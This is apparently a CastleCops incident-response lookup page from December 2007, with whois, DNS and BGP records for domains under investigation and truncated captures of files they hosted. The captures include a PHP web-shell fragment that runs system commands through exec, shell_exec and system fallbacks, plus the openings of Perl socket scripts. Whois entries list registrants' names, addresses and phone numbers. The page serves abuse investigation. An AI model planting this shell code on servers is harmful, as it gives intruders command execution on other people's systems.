WsIRT^(TM)

• whois
• dig
• host
• fetch
• asn

---

whois

at 24 Dec, 2007 @ 05:05:55
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Checking server [whois.idnic.net.id] The GeekTools Whois Proxy has encountered an error: Unable to connect to the specified registry whois.idnic.net.id. Please try your query again later.

---

whois

at 24 Dec, 2007 @ 05:20:21
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Checking server [whois.crsnic.net] Checking server [whois.gkg.net] Results: The Data in GKG.NET's WHOIS database is provided by GKG.NET for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. GKG.NET does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this Data only for lawful purposes and that, under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail (spam); or (2) enable high volume, automated, electronic processes that apply to GKG.NET (or its systems). GKG.NET reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Registrant: trimedia David Weber 155 Beck Lane Bastrop, TX 78602 US +1.5127431060 salesint@planetwave.net Administrative Contact: trimedia David Weber 155 Beck Lane Bastrop, TX 78602 US +1.5127431060 salesint@planetwave.net Technical Contact: trimedia David Weber 155 Beck Lane Bastrop, TX 78602 US +1.5127431060 salesint@planetwave.net Billing Contact trimedia Carol Munroe 952 Mack Rd Aransas Pass, TX 78336 US +1.3615570349 salesint@planetwave.net Registrar..: gkg.net (http://register.gkg.net/) Domain Name: TRIMEDIA-ONLINE.NET Created on..............: 17-JUN-2006 Expires on..............: 17-JUN-2009 Record last updated on..: 26-OCT-2006 Status..................: ACTIVE Domain servers in listed order: NS7.HOSTEXCELLENCE.COM NS8.HOSTEXCELLENCE.COM

---

whois

at 24 Dec, 2007 @ 05:20:41
GeekTools Whois Proxy v5.0.4 Ready. Checking access for CastleCops WsIRT... ok. Checking server [whois.crsnic.net] Checking server [whois.35.com] Results: The Data in OnlineNIC's WHOIS database is provided by OnlineNIC for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. OnlineNIC does not guarantee its accuracy. By starting a WHOIS query, you agree that you will use this Data only for lawful purposes and that, under no circumstances will you use this Data to: (1)allow, enable, or otherwise support the transmission of mass unsolicited,commercial advertising or solicitations via e-mail(spam). (2)enable high volume,automated, electronic processes that apply to OnlineNIC Inc.(or its systems). OnlineNIC reserves the right to modify these terms at any time. By starting this query, you agree to abide by this policy. Registrant: Pablo Vilches Gambra 450@ciberdomain.com +34.000000000 Pablo Vilches Gambra Sta. Engracia, 89, 1 Izda. Madrid,Madrid,ES 28002 Domain Name:lasiestamadrid.com Record last updated at 2007-11-13 06:57:59 Record created on 2006/11/15 Record expired on 2008/11/15 Domain servers in listed order: ns1.ciberdomain16.com ns2.ciberdomain16.com Administrator: Name-- Pablo Vilches Gambra EMail-: (450@ciberdomain.com) tel --: +34.000000000 org: Pablo Vilches Gambra Sta. Engracia, 89, 1 Izda. Madrid,Madrid,ES 28002 Technical Contactor: Name-- Pablo Vilches Gambra EMail-: (450@ciberdomain.com) tel --: +34.000000000 org: Pablo Vilches Gambra Sta. Engracia, 89, 1 Izda. Madrid,Madrid,ES 28002 Billing Contactor: Name-- Ana Maria Iglesias Cheda EMail-: (gestion@ciberdomain.com) tel --: +34.924660619 org: Ciberdomain Networks C/ Jamaica, 79 Almendralejo,Badajoz,ES 06200 Registration Service Provider: name: Ciberdomain Networks tel: +34.924660619 fax: +34.924660619 web:http://www.ciberdomain.com Results brought to you by the GeekTools WHOIS Proxy Server results may be copyrighted and are used with permission. Your host (CastleCops WsIRT) has visited 18 times today.

---

dig any

at 24 Dec, 2007 @ 05:05:39
;www.pcr.ac.id. IN A www.pcr.ac.id. 3233 IN A 124.81.214.3 pcr.ac.id. 227 IN NS ns1.pcr.ac.id. pcr.ac.id. 227 IN NS ns2.pcr.ac.id. ;pcr.ac.id. IN A ;pcr.ac.id. IN MX pcr.ac.id. 3600 IN MX 10 webmail.pcr.ac.id. ;; connection timed out; no servers could be reached ;; connection timed out; no servers could be reached ;pcr.ac.id. IN TXT ;www.pcr.ac.id. IN CNAME ;www.pcr.ac.id. IN PTR ;pcr.ac.id. IN KEY ;www.pcr.ac.id. IN HINFO ;www.pcr.ac.id. IN AAAA ;; Query time: 0 msec ;; SERVER: 204.152.187.13#53(204.152.187.13) ;; WHEN: Mon Dec 24 05:05:39 2007 ;; MSG SIZE rcvd: 81

---

dig any

at 24 Dec, 2007 @ 05:20:21
; <<>> DiG 9.3.4 <<>> trimedia-online.net any ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1370 ;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 2, ADDITIONAL: 2 ;; QUESTION SECTION: ;trimedia-online.net. IN ANY ;; ANSWER SECTION: trimedia-online.net. 85346 IN SOA ns7.hostexcellence.com. sales.hostexcellence.com. 2006102601 10800 3600 604800 86400 trimedia-online.net. 85344 IN MX 10 mail44.hostexcellence.com. trimedia-online.net. 85342 IN A 71.18.186.181 trimedia-online.net. 85341 IN NS ns8.hostexcellence.com. trimedia-online.net. 85341 IN NS ns7.hostexcellence.com. ;; AUTHORITY SECTION: trimedia-online.net. 85341 IN NS ns7.hostexcellence.com. trimedia-online.net. 85341 IN NS ns8.hostexcellence.com. ;; ADDITIONAL SECTION: ns7.hostexcellence.com. 85341 IN A 71.18.255.100 ns8.hostexcellence.com. 85341 IN A 71.18.216.4 ;; Query time: 1 msec ;; SERVER: 204.152.184.68#53(204.152.184.68) ;; WHEN: Mon Dec 24 05:20:21 2007 ;; MSG SIZE rcvd: 232

---

dig any

at 24 Dec, 2007 @ 05:20:41
; <<>> DiG 9.3.4 <<>> lasiestamadrid.com any ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 64216 ;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 2, ADDITIONAL: 1 ;; QUESTION SECTION: ;lasiestamadrid.com. IN ANY ;; ANSWER SECTION: lasiestamadrid.com. 86373 IN MX 10 mail.lasiestamadrid.com. lasiestamadrid.com. 85348 IN A 89.248.100.178 lasiestamadrid.com. 85348 IN NS ns1.ciberdomain16.com. lasiestamadrid.com. 85348 IN NS ns2.ciberdomain16.com. ;; AUTHORITY SECTION: lasiestamadrid.com. 85348 IN NS ns1.ciberdomain16.com. lasiestamadrid.com. 85348 IN NS ns2.ciberdomain16.com. ;; ADDITIONAL SECTION: mail.lasiestamadrid.com. 86373 IN A 89.248.100.178 ;; Query time: 1 msec ;; SERVER: 204.152.184.68#53(204.152.184.68) ;; WHEN: Mon Dec 24 05:20:41 2007 ;; MSG SIZE rcvd: 167

---

host

at 24 Dec, 2007 @ 05:05:55

---

host

at 24 Dec, 2007 @ 05:20:21

---

host

at 24 Dec, 2007 @ 05:20:41

---

fetched page

at 24 Dec, 2007 @ 05:02:08
MD5 Fingerprint: 4348b36aacad9ca93c5a977901697b92
SHA1 Fingerprint: b491a1cf2686ae4d91a05ed323132030f0800d58
HTTP/1.1 200 OK Date: Mon, 24 Dec 2007 05:01:52 GMT Server: Apache/2.0.54 (Linux/SUSE) Last-Modified: Sun, 23 Dec 2007 18:04:23 GMT ETag: "b7853-34ff-f101d7c0" Accept-Ranges: bytes Content-Length: 13567 Content-Type: text/plain #!/usr/bin/perl ######################################################################################################################## # ______ __ ___ _ __ ___ __ __ # #/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / # # / / / _ \/ -_) TRUNCATED BY CASTLECOPS FOR PUBLIC DISPLAY -- CONTACT STAFF FOR DETAILS

---

fetched page

at 24 Dec, 2007 @ 05:04:58
MD5 Fingerprint: 14cbf8536c6b068b95910e711244ddc1
SHA1 Fingerprint: ba13c24227a75aa9ea39e93ea17938dbc962b0da
TRUNCATED BY CASTLECOPS FOR PUBLIC DISPLAY -- CONTACT STAFF FOR DETAILS

---

fetched page

at 24 Dec, 2007 @ 05:05:15
MD5 Fingerprint: b6ec1f9a0bbb8439d45162203f435076
SHA1 Fingerprint: a586fcb9035fea2ffd379270758b5bc1fefe8175
HTTP/1.1 200 OK Date: Mon, 24 Dec 2007 05:05:14 GMT Server: Apache Last-Modified: Tue, 13 Nov 2007 20:54:46 GMT ETag: "53c902-293-473a0f16" Accept-Ranges: bytes Content-Length: 659 Content-Type: text/plain <?php echo "Mic22"; $cmd="id"; $eseguicmd=ex($cmd); echo $eseguicmd; function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } else TRUNCATED BY CASTLECOPS FOR PUBLIC DISPLAY -- CONTACT STAFF FOR DETAILS

---

fetched page

at 24 Dec, 2007 @ 05:05:35
MD5 Fingerprint: 616562be88caa4a2319a7b3f16231552
SHA1 Fingerprint: 090ed1b9ea85b159af776eafecfdd2c9cd4d80f7
HTTP/1.1 200 OK Date: Mon, 24 Dec 2007 05:05:33 GMT Server: Apache/2.0.52 (CentOS) Last-Modified: Thu, 06 Dec 2007 00:45:38 GMT ETag: "1ee4259-165d-4409372d87080" Accept-Ranges: bytes Content-Length: 5725 Content-Type: image/jpeg X-Pad: avoid browser bug <STYLE> .skin { BORDER-RIGHT: #cccccc 0px; BORDER-TOP: #cccccc 0px; BORDER-LEFT: #cccccc 0px; BORDER-BOTTOM: #cccccc 0px; BACKGROUND-COLOR: #000000; color:#00FF00; } input { BORDER-RIGHT: #333333 1px solid; BORDER-TOP: #333333 1px solid; BORDER-LEFT: #333333 1px solid; BORDER-BOTTOM: #333333 1px solid; BACKGROUND-COLOR: #990000; color:#FFF TRUNCATED BY CASTLECOPS FOR PUBLIC DISPLAY -- CONTACT STAFF FOR DETAILS

---

fetched page

at 24 Dec, 2007 @ 05:06:39
MD5 Fingerprint: 14cbf8536c6b068b95910e711244ddc1
SHA1 Fingerprint: ba13c24227a75aa9ea39e93ea17938dbc962b0da
HTTP/1.1 200 OK Date: Mon, 24 Dec 2007 05:06:21 GMT Server: Apache/2.0.54 (Linux/SUSE) Last-Modified: Mon, 24 Dec 2007 10:46:32 GMT ETag: "b7cef-1b82-f0f99200" Accept-Ranges: bytes Content-Length: 7042 Content-Type: text/plain <? $dir = @getcwd(); echo "Mic22<br>"; $OS = @PHP_OS; echo "OSTYPE:$OS<br>"; $free = disk_free_space($dir); if ($free === FALSE) {$free = 0;} if ($free < 0) {$free = 0;} echo "Free:".view_size($free)."<br>"; $cmd="id"; $eseguicmd=ex($cmd); echo $eseguicmd; function ex($cfe){ $res = ''; if (!empty($cfe)){ TRUNCATED BY CASTLECOPS FOR PUBLIC DISPLAY -- CONTACT STAFF FOR DETAILS

---

fetched page

at 24 Dec, 2007 @ 05:11:55
MD5 Fingerprint: 98952f368bf1cb4c04ba8f71d554ceb5
SHA1 Fingerprint: 40deb134652774358d34de7fa523b7be2820ce51
HTTP/1.1 200 OK Date: Mon, 24 Dec 2007 05:11:29 GMT Server: Apache/2.0.54 (Linux/SUSE) Last-Modified: Mon, 24 Dec 2007 10:36:44 GMT ETag: "b7cee-350d-cded6700" Accept-Ranges: bytes Content-Length: 13581 Content-Type: text/plain #!/usr/bin/perl ######################################################################################################################## # ______ __ ___ _ __ ___ __ __ # #/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / # # / / / _ \/ -_) TRUNCATED BY CASTLECOPS FOR PUBLIC DISPLAY -- CONTACT STAFF FOR DETAILS

---

fetched page

at 24 Dec, 2007 @ 05:14:36
MD5 Fingerprint: 3a1c9ba7c903dae30b998f7ad4c3fd68
SHA1 Fingerprint: e3a7d108a6143eaaf433b38d914e58f1436eda09
TRUNCATED BY CASTLECOPS FOR PUBLIC DISPLAY -- CONTACT STAFF FOR DETAILS

---

fetched page

at 24 Dec, 2007 @ 05:16:23
MD5 Fingerprint: d41d8cd98f00b204e9800998ecf8427e
SHA1 Fingerprint: da39a3ee5e6b4b0d3255bfef95601890afd80709
HTTP/1.1 200 OK Date: Mon, 24 Dec 2007 05:15:17 GMT Server: Apache/2.0.54 (Linux/SUSE) Last-Modified: Tue, 25 Dec 2007 09:09:51 GMT ETag: "b7d33-3a92-b50cb5c0" Accept-Ranges: bytes Content-Length: 14994 Content-Type: text/plain ################################################################################################################################################# #!/usr/bin/perl ################################################################################################################################################# use IO::Socket::INET; use HTTP::Request; use LWP::UserAgent; ###############CONFIGUR TRUNCATED BY CASTLECOPS FOR PUBLIC DISPLAY -- CONTACT STAFF FOR DETAILS

---

Corresponding BGP Origin ASN

at 24 Dec, 2007 @ 05:20:44
AS | BGP Prefix | CC | Registry | Allocated
"42237 | 89.248.100.0/24 | ES | ripencc | 2006-07-04"

---

Possible BGP peer ASNs one AS hop away from BGP Origin ASN

at 24 Dec, 2007 @ 05:20:44
AS Peers | BGP Prefix | CC | Registry | Allocated
"174 8928 | 89.248.100.0/24 | ES | ripencc | 2006-07-04"

---

Corresponding BGP Origin ASN

at 24 Dec, 2007 @ 05:21:06
AS | BGP Prefix | CC | Registry | Allocated
"32392 | 71.18.0.0/16 | US | arin | 2006-02-21"

---

Possible BGP peer ASNs one AS hop away from BGP Origin ASN

at 24 Dec, 2007 @ 05:21:06
AS Peers | BGP Prefix | CC | Registry | Allocated
"209 32992 | 71.18.0.0/16 | US | arin | 2006-02-21"

---

AS Description of a given BGP ASN

at 24 Dec, 2007 @ 05:21:07
AS | CC | Registry | Allocated | AS Name
"42237 | ES | ripencc | 2007-01-23 | INTERDOMINIOS Grupo Interdominios S.A."

---

Corresponding BGP Origin ASN

at 24 Dec, 2007 @ 05:21:34
AS | BGP Prefix | CC | Registry | Allocated
"4795 | 124.81.208.0/20 | ID | apnic | 2006-01-27"

---

Possible BGP peer ASNs one AS hop away from BGP Origin ASN

at 24 Dec, 2007 @ 05:21:34
AS Peers | BGP Prefix | CC | Registry | Allocated
"4761 | 124.81.208.0/20 | ID | apnic | 2006-01-27"

---

AS Description of a given BGP ASN

at 24 Dec, 2007 @ 05:21:35
AS | CC | Registry | Allocated | AS Name
"32392 | US | arin | 2004-04-26 | OPENTRANSFER-ECOMMERCE - Ecommerce Corporation"

---

AS Description of a given BGP ASN

at 24 Dec, 2007 @ 05:22:05
AS | CC | Registry | Allocated | AS Name
"4795 | ID | apnic | 1996-10-30 | INDOSAT2-ID INDOSATM2 ASN"